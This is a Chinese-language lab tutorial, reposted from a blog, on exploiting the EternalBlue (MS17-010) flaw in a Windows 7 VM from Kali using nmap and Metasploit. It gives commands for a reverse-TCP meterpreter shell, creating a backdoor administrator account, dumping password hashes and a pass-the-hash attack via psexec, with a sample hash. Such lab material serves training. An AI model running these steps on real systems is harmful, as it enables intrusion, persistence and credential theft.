0


通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作

环境说明

机器

ip地址

Kali主机

192.168.231.129

win7靶机

192.168.231.143

一、获取目标主机的管理员权限

1.使用kali虚拟机作为攻击机,利用nmap扫描获取目标的IP地址及漏洞,将两个机器包括一个攻击机Kali、win7的网络连接模式都是NAT,即在一个网段里面,然后进行扫描网段,查看存活主机,下面是两台机器的ip地址查看,可以看到两台机器在同一个网段内,

即网段都在192.168.231中

2.然后可以使用命令:Nmap -v –sP 192.168.231.1/24进行网段扫描,

可以看到140和143的主机是存活的(因为这里我还开了一台靶机WindowsXP,该实验同样可以在WindowsXP中实现,实验步骤一样),还有一点发现就是在网段扫描中不会出现129的出现,

因为129是Kali攻击机的ip地址,所以不会显示;

3.然后扫描目标主机的漏洞,使用命令:nmap -v --script=vuln 192.168.231.143(这里包括以后都以win7为例,winXP是同样的操作),

可以看到这里有一个ms17-010的漏洞,即我们熟知永恒之蓝漏洞,我们就可以利用这个漏洞来获得靶机的shell,

4.使用命令:msfconsole,进入metasploit工具,

然后使用search命令,搜索永恒之蓝有什么可以利用的部分,search ms17-010,

可以看到有0-4五个可以利用的漏洞,这里我们使用0栈溢出漏洞,使用use 0即可,

5.然后它提示我们没有设置载荷,可以使用set命令来设置载荷,如:

set PAYLOAD windows/x64/meterpreter/reverse_tcp

6.然后查看攻击模块所需要配置的参数:show options,

7.在这里我们需要配置lhost,rhost,target,

为了确保参数都配置好了,我们还是查看一下,

可以看到该配置的参数都配置好了,然后就可以进行攻击了,

8.使用run命令,进行渗透攻击,

可以看到我们已经成功渗透进入了win7,并获取了管理员权限,

9.然后进入win7目标机命令窗口,shell,

可以看到出现了乱码,然后我们可以进行调整回正确的显示,输入:chcp 65001即可,

然后我们就可以进行后渗透操作。

二、创建管理员账户

1.首先我们在win7的 控制面板->用户账户和家庭安全->用户账户->管理账户中可以查看现在已有的账户,然后我们进入shell并在目标机创建新的管理员用户,使用命令net user hacker hacker123 /add

2.但在这里我们可以看到,新建的用户hacker并不是一个管理员用户,所以还需要进行提权操作,使用命令,net localgroup Administrators hacker /add

然后我们可以看到hacker有之前的标准用户变成了管理员用户,

三、提取系统用户和密码hash值

提取系统用户名和密码Hash,使用命令,run post/windows/gather/hashdump

可以看到这里有刚刚创建的管理员用户hacker的用户名和hash密码,

四、hash重放攻击

1.所谓重放密码hash攻击,就是不再利用该漏洞,直接通过账户名和密码hash值进行攻击账户,从而达到获取管理员权限的目的。所以我们得退出现有的环境,不用该漏洞,直接exit,然后再重新进去msf,使用msfconsole,

2.接着使用命令:use windows/smb/psexec;并进行payload的设置,set PAYLOAD windows/meterpreter/reverse_tcp;然后设置主机和靶机的ip,

3.在设置账户和密码hash之前要先将win7下的UAC关闭,并将win7重启,不然会失败,

4.设置账户,set SMBUser sherry即可,接着就是使用密码hash进行重放攻击了,直接使用之前获取的hash密码,set SMBPass aad3b435b51404eeaad3b435b51404ee:5f8d3ac1c35a759a467f1d77ff0419a9

在渗透之前再查看一遍参数是否全部设置成功,

5.在全部准备工作完成好之后,直接exploit即可,也可以使用run运行,


本文转载自: https://blog.csdn.net/weixin_60182338/article/details/129622710
版权归原作者 栩珩 所有, 如有侵权,请联系我们删除。

“通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作”的评论:

还没有评论